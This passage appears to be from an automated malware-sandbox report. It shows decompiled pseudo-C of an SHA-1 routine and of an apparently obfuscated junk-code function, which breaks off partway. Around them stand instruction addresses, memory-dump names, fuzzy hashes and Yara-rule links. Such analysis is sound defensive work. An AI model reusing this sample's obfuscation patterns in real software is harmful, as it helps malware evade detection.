				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                                                                                                                                                              0x00408c6b
                                                                                                                                                              0x00408c6f
                                                                                                                                                              0x00408c71
                                                                                                                                                              0x00408c71
                                                                                                                                                              0x00408c74
                                                                                                                                                              0x00408c96
                                                                                                                                                              0x00408cbc
                                                                                                                                                              0x00408ce2
                                                                                                                                                              0x00408d04
                                                                                                                                                              0x00408d0b
                                                                                                                                                              0x00408d0e
                                                                                                                                                              0x00408d11
                                                                                                                                                              0x00408d1a
                                                                                                                                                              0x00408d20
                                                                                                                                                              0x00408d27
                                                                                                                                                              0x00408d38
                                                                                                                                                              0x00408d3b
                                                                                                                                                              0x00408d3e
                                                                                                                                                              0x00408d42
                                                                                                                                                              0x00408d44
                                                                                                                                                              0x00408d46
                                                                                                                                                              0x00408d4f
                                                                                                                                                              0x00408d52
                                                                                                                                                              0x00408d55
                                                                                                                                                              0x00408d60
                                                                                                                                                              0x00408d66
                                                                                                                                                              0x00408d68
                                                                                                                                                              0x00408d68
                                                                                                                                                              0x00408d6b
                                                                                                                                                              0x00408d6e
                                                                                                                                                              0x00408d6e
                                                                                                                                                              0x00408d73
                                                                                                                                                              0x00408d75
                                                                                                                                                              0x00408d78
                                                                                                                                                              0x00408d7b
                                                                                                                                                              0x00408d81
                                                                                                                                                              0x00408d84
                                                                                                                                                              0x00408d87
                                                                                                                                                              0x00408d90
                                                                                                                                                              0x00408d96
                                                                                                                                                              0x00408d9f
                                                                                                                                                              0x00408dae
                                                                                                                                                              0x00408db5
                                                                                                                                                              0x00408db8
                                                                                                                                                              0x00408dbb
                                                                                                                                                              0x00408dc4
                                                                                                                                                              0x00408dc7
                                                                                                                                                              0x00408dca
                                                                                                                                                              0x00408de2
                                                                                                                                                              0x00408de9
                                                                                                                                                              0x00408deb
                                                                                                                                                              0x00408dee
                                                                                                                                                              0x00408df1
                                                                                                                                                              0x00408dfa
                                                                                                                                                              0x00408e01
                                                                                                                                                              0x00408e04
                                                                                                                                                              0x00408e07
                                                                                                                                                              0x00408e16
                                                                                                                                                              0x00408e1d
                                                                                                                                                              0x00408e20
                                                                                                                                                              0x00408e23
                                                                                                                                                              0x00408e2c
                                                                                                                                                              0x00408e36
                                                                                                                                                              0x00408e39
                                                                                                                                                              0x00408e45
                                                                                                                                                              0x00408e48
                                                                                                                                                              0x00408e4f
                                                                                                                                                              0x00408e52
                                                                                                                                                              0x00408e55
                                                                                                                                                              0x00408e5a
                                                                                                                                                              0x00408e5d
                                                                                                                                                              0x00408e66
                                                                                                                                                              0x00408e77
                                                                                                                                                              0x00408e7a
                                                                                                                                                              0x00408e7d
                                                                                                                                                              0x00408e84
                                                                                                                                                              0x00408e87
                                                                                                                                                              0x00408e8a
                                                                                                                                                              0x00408e8d
                                                                                                                                                              0x00408e8f
                                                                                                                                                              0x00408e92
                                                                                                                                                              0x00408e95
                                                                                                                                                              0x00408e9e
                                                                                                                                                              0x00408ea3
                                                                                                                                                              0x00408ea3
                                                                                                                                                              0x00408eb8
                                                                                                                                                              0x00408ebb
                                                                                                                                                              0x00408ebe
                                                                                                                                                              0x00408ec5
                                                                                                                                                              0x00408ec8
                                                                                                                                                              0x00408ecb
                                                                                                                                                              0x00408ee0
                                                                                                                                                              0x00408ee7
                                                                                                                                                              0x00408eea
                                                                                                                                                              0x00408eee
                                                                                                                                                              0x00408ef1
                                                                                                                                                              0x00408ef6
                                                                                                                                                              0x00408ef9
                                                                                                                                                              0x00408f08
                                                                                                                                                              0x00408f0b
                                                                                                                                                              0x00408f12
                                                                                                                                                              0x00408f15
                                                                                                                                                              0x00408f18
                                                                                                                                                              0x00408f1b
                                                                                                                                                              0x00408f1e
                                                                                                                                                              0x00408f26
                                                                                                                                                              0x00408f34
                                                                                                                                                              0x00408f37
                                                                                                                                                              0x00408f3a
                                                                                                                                                              0x00408f3a
                                                                                                                                                              0x00408f41
                                                                                                                                                              0x00408f44
                                                                                                                                                              0x00408f47
                                                                                                                                                              0x00408f4f
                                                                                                                                                              0x00408f5d
                                                                                                                                                              0x00408f60
                                                                                                                                                              0x00408f67
                                                                                                                                                              0x00408f6a
                                                                                                                                                              0x00408f6d
                                                                                                                                                              0x00408f70
                                                                                                                                                              0x00408f73
                                                                                                                                                              0x00408f7c
                                                                                                                                                              0x00408f83
                                                                                                                                                              0x00408f83
                                                                                                                                                              0x00408f89
                                                                                                                                                              0x00408fa2
                                                                                                                                                              0x00408fa5
                                                                                                                                                              0x00408fac
                                                                                                                                                              0x00408faf
                                                                                                                                                              0x00408fb2
                                                                                                                                                              0x00408fc4
                                                                                                                                                              0x00408fce
                                                                                                                                                              0x00408fd1
                                                                                                                                                              0x00408fda
                                                                                                                                                              0x00408fdd
                                                                                                                                                              0x00408fe4
                                                                                                                                                              0x00408fe7
                                                                                                                                                              0x00408fed
                                                                                                                                                              0x00409000
                                                                                                                                                              0x00409007
                                                                                                                                                              0x0040900a
                                                                                                                                                              0x0040900d
                                                                                                                                                              0x00409010
                                                                                                                                                              0x00409019
                                                                                                                                                              0x0040901c
                                                                                                                                                              0x0040902f
                                                                                                                                                              0x00409032
                                                                                                                                                              0x0040903c
                                                                                                                                                              0x0040903f
                                                                                                                                                              0x00409041
                                                                                                                                                              0x0040904a
                                                                                                                                                              0x0040904d
                                                                                                                                                              0x00409060
                                                                                                                                                              0x00409066
                                                                                                                                                              0x00409069
                                                                                                                                                              0x00409070
                                                                                                                                                              0x00409072
                                                                                                                                                              0x00409075
                                                                                                                                                              0x00409078
                                                                                                                                                              0x0040907b
                                                                                                                                                              0x0040907e
                                                                                                                                                              0x00409081
                                                                                                                                                              0x0040908a
                                                                                                                                                              0x0040908f
                                                                                                                                                              0x00409092
                                                                                                                                                              0x00409092
                                                                                                                                                              0x004090a5
                                                                                                                                                              0x004090a8
                                                                                                                                                              0x004090ab
                                                                                                                                                              0x004090b2
                                                                                                                                                              0x004090b5
                                                                                                                                                              0x004090b8
                                                                                                                                                              0x004090bb
                                                                                                                                                              0x004090ce
                                                                                                                                                              0x004090d1
                                                                                                                                                              0x004090dc
                                                                                                                                                              0x004090df
                                                                                                                                                              0x004090eb
                                                                                                                                                              0x004090ee
                                                                                                                                                              0x004090f4
                                                                                                                                                              0x004090f7
                                                                                                                                                              0x004090fa
                                                                                                                                                              0x00409101
                                                                                                                                                              0x00409111
                                                                                                                                                              0x00409114
                                                                                                                                                              0x0040911a
                                                                                                                                                              0x0040911d
                                                                                                                                                              0x00409124
                                                                                                                                                              0x00409126
                                                                                                                                                              0x00409129
                                                                                                                                                              0x0040912c
                                                                                                                                                              0x0040912f
                                                                                                                                                              0x00409132
                                                                                                                                                              0x00409139
                                                                                                                                                              0x00409148
                                                                                                                                                              0x0040914b
                                                                                                                                                              0x00409152
                                                                                                                                                              0x00409155
                                                                                                                                                              0x00409158
                                                                                                                                                              0x0040915b
                                                                                                                                                              0x0040915e
                                                                                                                                                              0x00409161
                                                                                                                                                              0x00409164
                                                                                                                                                              0x0040916d
                                                                                                                                                              0x0040917e
                                                                                                                                                              0x00409186
                                                                                                                                                              0x0040918c
                                                                                                                                                              0x0040918f
                                                                                                                                                              0x00409191
                                                                                                                                                              0x00409194
                                                                                                                                                              0x00409197
                                                                                                                                                              0x004091a4

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (
                                                                                                                                                              • API String ID: 0-3887548279
                                                                                                                                                              • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                              • Instruction ID: d8c2fb7df0c5b58699e1db2dcf7a8d999a68655801dbc0658ec4d80d3c45db5f
                                                                                                                                                              • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                              • Instruction Fuzzy Hash: 19021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009CD06D, Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __aullrem
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3758378126-0
                                                                                                                                                              • Opcode ID: 118b915d8d39fe5a3853412fcca9ae1a65cfd75d6746d980f0933ae7f5a1e435
                                                                                                                                                              • Instruction ID: e4c3822400683852f76ea6e7da75314e30280267c184c5a9f85bd89003ab29de
                                                                                                                                                              • Opcode Fuzzy Hash: 118b915d8d39fe5a3853412fcca9ae1a65cfd75d6746d980f0933ae7f5a1e435
                                                                                                                                                              • Instruction Fuzzy Hash: A9511D72E1151A9FCF18CFA8C891ABEF7B1BB88310F24853DD525E7240D734AA44CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0097DF7C, Relevance: 1.6, Strings: 1, Instructions: 372COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @
                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                              • Opcode ID: 18e5ab3045d14d72c522de0f25d1adfa1e8e77db0bb8346fea1870cf785bcf16
                                                                                                                                                              • Instruction ID: 092720c8b8dafcfa244797ed54c3b6b2f980f85b4ffe5161690244590841f2c5
                                                                                                                                                              • Opcode Fuzzy Hash: 18e5ab3045d14d72c522de0f25d1adfa1e8e77db0bb8346fea1870cf785bcf16
                                                                                                                                                              • Instruction Fuzzy Hash: 46D18B32D0820ADFCF28CF98C5856BDBBB5FB49304F64C4AAD41AA7251D7789E41DB80
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009857C3, Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                              • Opcode ID: f9bd17d65fd1032a7d50895b856f23505e75680d3f8f1b5ea76f4161508b979f
                                                                                                                                                              • Instruction ID: eeadeed861071ff9c59c1d635b0eb8a8eedf2a9f2838e59f20138c831119da4a
                                                                                                                                                              • Opcode Fuzzy Hash: f9bd17d65fd1032a7d50895b856f23505e75680d3f8f1b5ea76f4161508b979f
                                                                                                                                                              • Instruction Fuzzy Hash: B4A13871A046097EDF25EFA4CC51BFE37A8AF49310F0404AAF946DA2D1C678CD94DB61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00960F3F, Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                              • Opcode ID: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
                                                                                                                                                              • Instruction ID: d60c995342bc144cf0e221eb208d931020c174601787c7c0d9237fcb0edb0fa6
                                                                                                                                                              • Opcode Fuzzy Hash: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
                                                                                                                                                              • Instruction Fuzzy Hash: 8881F833E001159BDF28CE6CC89467D7765EF86320F25862DD926AB6C6D770AD81CBC0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041CD3A, Relevance: 1.5, Strings: 1, Instructions: 232COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 55%
                                                                                                                                                              			E0041CD3A(signed int __eax, signed int __ebx, void* __ecx, void* __edx, intOrPtr __edi, void* __esi) {
				signed int _t41;
				signed int _t48;
				intOrPtr _t49;
				void* _t55;
				intOrPtr _t60;
				signed int _t65;
				intOrPtr _t66;
				signed int _t70;

				_t60 = __edi;
				_t41 = __eax;
				_push(__ecx);
				asm("sbb [0x8e76a02b], ebx");
				_t44 = __ebx ^ 0xd0926f0e;
				_t70 = __ebx ^ 0xd0926f0e;
				if(_t70 >= 0) {
					L1:
					asm("sbb [0x3984f5c7], esi");
					asm("sbb al, 0xf6");
				} else {
					__ebx =  *0x3aacd47d * 0xd9a1;
					__cl = __cl + 0xa8;
					asm("sbb [0xdbd5d02a], dl");
					 *0x9ddef73d =  *0x9ddef73d ^ __esi;
					asm("rcr dword [0xa720d96c], 0x9f");
					__dl = __dl -  *0xb02549a2;
					_push(__ebp);
					 *0x58011220 =  *0x58011220 << 0x17;
					if( *0x58011220 < 0) {
						goto L1;
					} else {
						__esi = __esi |  *0xe7c28672;
						asm("adc eax, 0x7523ed85");
						asm("cmpsw");
						 *0x74205cd =  *0x74205cd ^ __esp;
						__ch = __ch | 0x00000034;
						_push( *0x8f4f186d);
						 *0x50f1a425 =  *0x50f1a425 << 0xa6;
						 *0x9177e0d6 =  *0x9177e0d6 >> 0x2b;
						__ebx = __ebx - 0xe66748c;
						__bl = __bl + 0x80;
						__bh = __bh &  *0xf6f3213a;
						asm("sbb al, [0xe1635af2]");
						 *0x685104c9 = __ch;
						 *0x408d00 =  *0x408d00 - __bh;
						 *0xf84b6a34 =  *0xf84b6a34 >> 0xea;
						__edx =  *0x3507fa39;
						__ebx = __ebx | 0xf04a9609;
						asm("sbb [0x73678932], ah");
						__edi = __edi - 1;
						 *0x2205eb96 = __eax;
						asm("adc ecx, 0x9de596fc");
						__ebp = __ebp + 1;
						asm("rol byte [0x833aa8e6], 0x9b");
						__ecx =  *0x47a50660 * 0x16e0;
						 *0x77111b8d =  *0x77111b8d | __esi;
						__ecx =  *0x47a50660 * 0x16e0 +  *0x5449083b;
						__edi = __edi ^  *0xe7964c3d;
						asm("sbb eax, 0xd6e2b0be");
						asm("sbb esi, [0xa2b2d7b8]");
						 *0xa199b736 =  *0xa199b736 & __ebp;
						__ebx = __ebx | 0xb24c4b15;
						if(__ebx < 0) {
							goto L1;
						} else {
							__edi =  *0x9f87b7c * 0xd07a;
							 *0x93603f8d =  *0x93603f8d - __esi;
							asm("sbb ebp, 0xd9e50083");
							if( *0x93603f8d != 0) {
								goto L1;
							} else {
								__esi = __esi & 0x50e7427a;
								 *0x126306c9 =  *0x126306c9 - __dl;
								asm("rcr byte [0x45598da8], 0x3b");
								asm("adc ebx, [0x89953917]");
								asm("rcr byte [0xab876734], 0x86");
								asm("adc ebx, 0xd45ac4ee");
								__edi = __edi + 1;
								__cl = __cl |  *0x437d23d0;
								asm("adc cl, 0xa0");
								asm("rcl byte [0x46651d7], 0xcb");
								asm("rcl byte [0xbede71ca], 0x16");
								asm("sbb edi, [0xc6d89339]");
								 *0xe5bb7f2e =  *0xe5bb7f2e & __ebx;
								__ecx = __edx;
								_push(__edx);
								_t31 = __eax;
								__eax =  *0xc373bb94;
								 *0xc373bb94 = _t31;
								asm("adc [0x6960a721], eax");
								_t32 = __edx;
								__edx =  *0xd54490b;
								 *0xd54490b = _t32;
								asm("sbb [0xf7ea6728], dl");
								__ecx = __ecx |  *0x1b76fe62;
								 *0xd5868c08 =  *0xd5868c08 >> 0xf6;
								asm("ror dword [0xd4cac525], 0x9b");
								__ebp = __ebp ^ 0x31cfe71b;
								 *0x33631c80 =  *0x33631c80 >> 0xfd;
								 *0xaae3c5 =  *0xaae3c5 & __esi;
								__edx =  *0xb7a918d1;
								__esp =  *0x58216219;
								__bl = __bl &  *0x523156e5;
								__esp =  *0x966da889;
								asm("rol byte [0x31900463], 0x49");
								 *0xa15c8e25 =  *0xa15c8e25 >> 0x2a;
								__ebx = __esi;
								asm("adc edi, [0x2324121]");
								__eax =  *0xc373bb94 | 0x29f8cc9f;
								asm("rcr dword [0x9f4a238f], 0x6e");
								 *0x190febf0 = __ebp;
								asm("adc ecx, 0xf33ce9f4");
								0xf941e61b = 0xffffffffcd6d5f95;
								__dh = __dh | 0x000000b7;
								 *0x92040b00 =  *0x92040b00 >> 0x3e;
								__ebp =  *0xe995a469 * 0x472e;
								 *0x3110de81 = __esi;
								asm("adc cl, 0x8a");
								if(__edi >=  *0x1552d385) {
									goto L1;
								} else {
									__ebp =  *0xc9598e7d * 0x64a5;
									asm("sbb eax, [0x590b1a17]");
									_push(__edx);
									 *0x65b5509 =  *0x65b5509 >> 0xad;
									if( *0x65b5509 < 0) {
										goto L1;
									} else {
										asm("sbb al, [0xdd1e1d1c]");
